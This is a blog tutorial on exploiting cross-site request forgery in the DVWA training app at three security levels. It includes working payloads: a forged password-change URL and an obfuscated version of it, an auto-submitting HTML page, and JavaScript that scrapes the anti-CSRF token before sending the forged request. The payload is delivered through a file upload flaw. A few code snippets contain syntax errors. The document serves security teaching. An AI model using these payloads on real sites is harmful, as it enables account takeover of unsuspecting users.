StackZero
  • Homepage
  • Cryptography and Privacy
  • Ethical Hacking
  • Reverse Engineering
  • Contacts
  • About Me
No Result
View All Result
StackZero
No Result
View All Result

How To Exploit CSRF In DVWA

November 23, 2022
in Ethical Hacking
0 0
How To Exploit CSRF In DVWA
0
SHARES
8.1k
VIEWS
Share on FacebookShare on Twitter

We have seen a detailed description of CSRF in the introductory article, so if you didn’t, I suggest reading it.
However, before going into the practical example of CSRF by exploiting DVWA, I would like to sum up this attack in a few words.

CSRF stands for Cross-Site Request Forgery and is an attack that occurs when in some way an attacker can trick your web browser into performing an unwanted action on a trusted website where you are currently authenticated.

As usual, before starting let’s see the prerequisites.

Table of Contents

Toggle
  • Step #0: Prerequisites:
  • Step #1: CSRF On DVWA With Low-Security Level:
  • Step #2: CSRF On DVWA With Medium-Security Level:
  • Step #3: CSRF On DVWA With High-Security Level:
  • Conclusion

Step #0: Prerequisites:

Setting up the lab for CSRF is extremely easy, especially by using the DVWA environment from TryHackMe!

I also assume you are working on a Kali Virtual Machine (I explained the setup in this article). So this tutorial will be based on that, even if there are just little changes with other distros.

So, once we have:

  • a working DVWA application
  • the attacking machine

we can run the VPN and log in.

As usual, the default credentials are:

  • Username: admin
  • Password: password
Dvwa login screen

The default difficulty is “Impossible”, so the next step will be to go into settings and set it as “Low”.

DVWA setting security

Finally, click on the CSRF menu item and we are ready to start!

Step #1: CSRF On DVWA With Low-Security Level:

As the level suggests, this is extremely easy, but consider it as a warm-up.
Furthermore, I think that this is the best level to understand the underlying concept if we missed something.

By opening the page, we see a form where we can change our password.

CSRF DVWA main page

The first thing that should come to mind is to try changing passwords and observing the results.

And after doing that we are still on the same page, but looking at the URL bar, there is an interesting value.
For example, if the new password is: “stackzero” the result will be something like this:

http://10.10.93.202/vulnerabilities/csrf/?password_new=stackzero&password_conf=stackzero&Change=Change#

It’s clear that the form accepts a GET HTTP request and sends three parameters named:

  • password_new
  • password_conf
  • Change

So try to imagine an attacker that will send you a malicious address like:

http://10.10.93.202/vulnerabilities/csrf/?password_new=stackzero&password_conf=stackzero&Change=Change#

If he finds a way to let you click when you are still authenticated, your password will automatically be stackzero.

If you don’t believe me, try to copy-paste that address (by replacing the IP with the one related to your DVWA instance), then log out of DVWA and try to log in again.
You will see that your password is no more “password” but now is “stackzero“.

This address can have an obvious behaviour, so the hacker could try to hide his intents in some ways, for example:

  • He can use a tool like CyberChef to obfuscate the URL for example with URL-Encoding so that the victim will see an URL like this one:
    http%3A%2F%2F10%2E10%2E93%2E202%2Fvulnerabilities%2Fcsrf%2F%3Fpassword%5Fnew%3Dhaker%5Fpassword%26password%5Fconf%3Dhacker%5Fpassword%26Change%3DChange%23
  • He can build a page containing a malicious JS code that sends the request on his hosting machine.
  • He can use a URL shortener like Bity.

It all depends on the attacker’s imagination.

In any case, we have passed the first level and created the payload we needed, we can then move to the next level!

Step #2: CSRF On DVWA With Medium-Security Level:

We are ready to increase a bit the difficulty, so go to the security settings and set the level as a medium.

By trying to open the malicious link we have just created at a low level it’s not working and the password remains the same.

Why?
The developer has added layer of security and in this case, the application checks the Referer (If you know what is it here is the Wikipedia Page).
What we need to know about the Referer field is that it’s an optional header field which specifies from which the HTTP request comes. In this case, the application checks that the request is coming from the same domain.

It can be good mitigation in general, but it’s not enough to stop us!
Intercepting the request and changing the Referer with Burp Suite is not possible in a real case because it should be done on the victim machine.

The first idea we can have is to create an HTML containing a script that sends a request to the vulnerable server by using XMLHttpRequest and setting the Referer as the target URL like this:

const HttpRequest = new XMLHttpRequest();
const url=const url = 'http://10.10.131.218/vulnerabilities/csrf/?password_new=stackzero&password_conf=stackzero&Change=Change#'
;
HttpRequest.open("GET", url);
HttpRequest.send();


That seems a good idea, but it cannot be done because the majority of the browsers don’t allow changing this header.

What we want at this point is to send the request directly from the target server, and to do that we have a very easy option.
As I told you in the introductory article at this address we can chain an XSS and a CSRF vulnerability, so we could pack this payload within a reflected XSS for example.

However, in this walkthrough, I want to show you another easier way that can make us just focus on CSRF.
We are going to use a file upload vulnerability to send our payload to the server and then we can simply deliver the malicious link.

So the first step is to set again the security of DVWA as low ( this is not a tutorial on File Upload so we don’t want to manage its security checks).

After doing that we can create an HTML file that I’m going to call “csrf_js.html“, and it will contain the payload.

This is the file content:

<html>
    <head>

    </head>
    <body onload="change_password()">
        <script>
            function change_password(){
            const request = new XMLHttpRequest();
            const url = 'http://10.10.131.218/vulnerabilities/csrf/?password_new=stackzero&password_conf=stackzero&Change=Change#'

            request.open("GET", url);
     
            request.send();

            </script>
    </body>
</html>

As you can see is a very basic request with Javascript that runs on a body load event.

“The URL depends on your target machine”

After saving this file, and setting the security as LOW, go into the File Upload section:

You can upload that and BAM!
Now you have your malicious link to send to your victim that has this format:

<VULNERABLE_SERVER_IP>/hackable/uploads/<HTML_PAYLOAD>

So in my case, it will be:

http://10.10.131.218/hackable/uploads/csrf_js.html

The exploit is done! Now set again DVWA security as Medium and try to go to that link.
Logging out and logging in again you can see that now your password is “stackzero” or whatever you put in the payload.
As an exercise, I suggest you do the same by taking advantage of XSS.

Step #3: CSRF On DVWA With High-Security Level:

Finally, we got to the last level, so got to settings and set the security as HIGH!

If you click on the CSRF button, apparently nothing has changed, but try to inspect the form!
This time something looks different:

		<form action="#" method="GET">
			New password:<br />
			<input type="password" AUTOCOMPLETE="off" name="password_new"><br />
			Confirm new password:<br />
			<input type="password" AUTOCOMPLETE="off" name="password_conf"><br />
			<br />
			<input type="submit" value="Change" name="Change">
			<input type='hidden' name='user_token' value='9bfa81172750a77bf8005690ed7a5593' />
		</form>

In particular, there is a hidden input value that changes on every page refresh.
It’s called “user_token” and we’ve already seen it here (CSRF token).

We are going to split our exploit into two steps:

  • A first call gets the “user_token” value by using a regex.
  • A second call runs the real exploit.

The way we are placing our exploit is the same as the medium difficulty level.
So I won’t spend so many words on that.

First of all our Javascript code has to send a normal request to the target page.

            const request = new XMLHttpRequest();
            const url = "http://10.10.174.199/vulnerabilities/csrf/"
            

            request.open("GET", url);

By default, the response is a string, so in the method called “onreadystatechanged” we can extract the user_token.

We can go faster by observing that it’s composed of 32 hexadecimal chars and that there are no ambiguities on the page.

This can be a working simple regex:

/[a-f0-9]{32}/g

After that, let’s write the function that will get the user_token through a regex and then changes the password.

            request.onreadystatechange = () => {
            if (request.readyState === request.DONE && request.status === 200) {

                var response = request.responseText;

                var user_token = /[a-f0-9]{32}/g.exec(response)[0]
                var payload = "http://10.10.174.199/vulnerabilities/csrf/?password_new=stackzero&password_conf=stackzero&Change=Change&user_token="+user_token;
                var second_request = new XMLHttpRequest();
                second_request.open("GET", payload);
                second_request.send()

            }
            };

In a few words, this code:

  • Saves the response of the first request in a variable
  • Uses a regex to find a user_token (the result is always a list even if it has just one element)
  • Builds the malicious URL
  • Sends the second request

Finally, to make the CSRF exploit work:

  • Set the security as LOW (we will see how to bypass the measures of File Upload in another article).
  • Go into the File Upload section and upload your exploit, as you did at the medium security level.
  • Set the security as HIGH
  • Imagine you send the link to the HTML file containing the exploit to your target.
  • Try to open the link you would have sent to your target
  • Log out, then try to log in and see if it worked.

At this point, I hope it’s pretty clear how to perform a real-world CSRF (even if you are on DVWA) attack combined with another vulnerability.

Just for clarity, I want to show you the complete exploit code:

Conclusion

In conclusion, you have seen how it’s possible to combine different vulnerabilities to reach the goal, and how a similar vulnerability can be dangerous.
You also saw how in certain cases the mitigations may not be enough, so pay attention if you are a developer.

What could be a valid solution?

In this case, two solutions to make the application more secure can be

  • to ask for the old password before proceeding
  • Asking for a captcha.

I take this opportunity to invite you to take a better look at the applications you use and to notice the solutions they use.

Meanwhile, I hope you enjoyed the article on how to exploit CSRF within a DVWA machine. If you like my work I invite you to follow this blog and all my social, it would help me a lot.

Thank you and see you in the next article.

Tags: application securitycsrfcsrf attackcybersecuritydvwaethical-hackingvulnerable applicationweb application securityweb exploitationweb security
Previous Post

CSRF Introduction: What you need to know!

 Next Post

What is unrestricted file upload vulnerability? And How to exploit it on DVWA!
Next Post
What is unrestricted file upload vulnerability? And How to exploit it on DVWA!

What is unrestricted file upload vulnerability? And How to exploit it on DVWA!

You might also like

Cryptographic functions

Cryptographic Hash Functions in Python: Secure Your Data Easily

November 3, 2024
Malware Obfuscation Techniques: All That You Need To Know

Malware Obfuscation Techniques: All That You Need To Know

March 25, 2024
How To Do Process Enumeration: An Alternative Way

How To Do Process Enumeration: An Alternative Way

March 4, 2024
How To Do DLL Injection: An In-Depth Cybersecurity Example

How To Do DLL Injection: An In-Depth Cybersecurity Example

February 8, 2024
Process Injection By Example: The Complete Guide

Process Injection By Example: The Complete Guide

January 24, 2024
How To Build Your Own: Python String Analysis for Malware Insights

How To Build Your Own: Python String Analysis for Malware Insights

November 10, 2023

StackZero

StackZero is a specialized technical blog dedicated to the realm of cybersecurity. It primarily provides insightful articles and comprehensive tutorials designed to educate readers on developing security tools. The blog encompasses a broad spectrum of subjects, starting from the foundational principles of cryptography and extending to more sophisticated areas such as exploitation and reverse engineering. This makes StackZero an invaluable resource for both beginners and professionals in the field of cybersecurity.
The blog covers a wide range of topics, from the basics of cryptography to the more advanced topics of exploitation and reverse engineering.

Tags

application security blind sqli blind sql injection bruteforce c cesar cipher command injection cryptography ctf cybersecurity debugging dom-based xss dvwa ethical-hacking ethical hacking exploitation file inclusion gdb hacking injection javascript malware malware analysis malware evasion network-security pentesting lab picoctf pico ctf python reflected xss reverse engineering sql sqli sql injection static analysis stored xss substitution substitution cipher vulnerable application web application security web exploitation web security windows windows api xss
  • About Me
  • Contacts
  • HomePage
  • Opt-out preferences
  • Privacy Policy
  • Terms and Conditions

Welcome Back!

Login to your account below

Forgotten Password?

Retrieve your password

Please enter your username or email address to reset your password.

Log In
Manage Cookie Consent
To provide the best experiences, we use technologies like cookies to store and/or access device information. Consenting to these technologies will allow us to process data such as browsing behavior or unique IDs on this site. Not consenting or withdrawing consent, may adversely affect certain features and functions.
Functional Always active
The technical storage or access is strictly necessary for the legitimate purpose of enabling the use of a specific service explicitly requested by the subscriber or user, or for the sole purpose of carrying out the transmission of a communication over an electronic communications network.
Preferences
The technical storage or access is necessary for the legitimate purpose of storing preferences that are not requested by the subscriber or user.
Statistics
The technical storage or access that is used exclusively for statistical purposes. The technical storage or access that is used exclusively for anonymous statistical purposes. Without a subpoena, voluntary compliance on the part of your Internet Service Provider, or additional records from a third party, information stored or retrieved for this purpose alone cannot usually be used to identify you.
Marketing
The technical storage or access is required to create user profiles to send advertising, or to track the user on a website or across several websites for similar marketing purposes.
Manage options Manage services Manage {vendor_count} vendors Read more about these purposes
View preferences
{title} {title} {title}
No Result
View All Result
  • Homepage
  • Cryptography and Privacy
  • Ethical Hacking
  • Reverse Engineering
  • Contacts
  • About Me